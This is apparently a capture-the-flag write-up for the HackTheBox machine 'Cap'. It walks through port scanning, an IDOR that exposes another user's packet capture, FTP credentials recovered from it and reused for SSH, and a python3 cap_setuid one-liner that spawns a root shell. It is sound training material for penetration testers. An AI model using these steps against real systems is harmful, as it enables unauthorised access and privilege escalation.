HackTheBox — Cap
As always, we start with nmap to discover open ports/services.
nmap -sC -sV -oA cap 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.079s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Sun, 06 Jun 2021 02:22:52 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.
There are 3 open ports:
21 => FTP
22 => SSH
80 => HTTP
FTP anonymous login is not allowed, so lets enumerate port 80.
Going to http://10.10.10.245 , we see a dashboard that displays network monitoring statistics.
On the left side there is security snapshot tab (5 second PCAP), lets visit it.
I guess that the server captures the packets between us and the server for 5 seconds and saves it in a PCAP file so we can download and analyze it.
Also notice the url http://10.10.10.245/data/11 , we can try IDOR vulnerability to download someone else’s PCAP file.
When I changed the value to 1 to get the first captured packets (maybe it contains ftp credentials), I successfully downloaded a different PCAP file.
But it doesn’t have any useful information.
Going to IP Config tab, it just executes ifconfig, nothing here too.
Network Status tab executes netstat command which shows us the same result as our nmap scan, nothing useful too.
But after a second I just tried to put 0 instead of 1 (maybe the administrator of the server starts naming the PCAP files from 0).
And I got a different file. So lets download it and filter for FTP traffic.
Initial Foothold / User
Now we got credentials for FTP.
Lets login to FTP using these credentials (nathan:Buck3tH4TF0RM3!)
Logged in successfully!
I tried these credentials on SSH and it worked.
Whenever you have credentials, try it on all available services.
Doing some enumeration, I found something interesting in /var/www/html/app.py
os.setuid(0) needs root privileges to be executed but the file app.py is owned by user nathan.
So for sure python has cap_setuid capability.
Now getting a root shell is very easy, just execute the following command.
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
And we are finally root on the box!